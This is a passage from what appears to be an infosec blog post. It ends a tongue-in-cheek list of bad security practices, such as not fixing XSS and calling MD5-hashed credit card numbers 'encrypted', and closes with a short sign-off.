  6. Go ahead and give developers the ability to deploy code to straight to production from their desktops. It helps them be agile and creates efficiency.
  7. Proxying egress web traffic is an invasion of privacy and makes users mad, so don't do it.
  8. Your vulnerability scanner is causing my service to crash! Turn it off!
  9. We don't need to fix XSS. You can't hack a server with it.
  10. But it is encrypted. We used MD5 hashing to store the credit cards in the database.
In a similar vein, you'll really enjoy Infosec Reactions if you haven't already seen it.
Welcome back, NFL refs. :-)
Cheers.

Viewing all 134 articles
Browse latest View live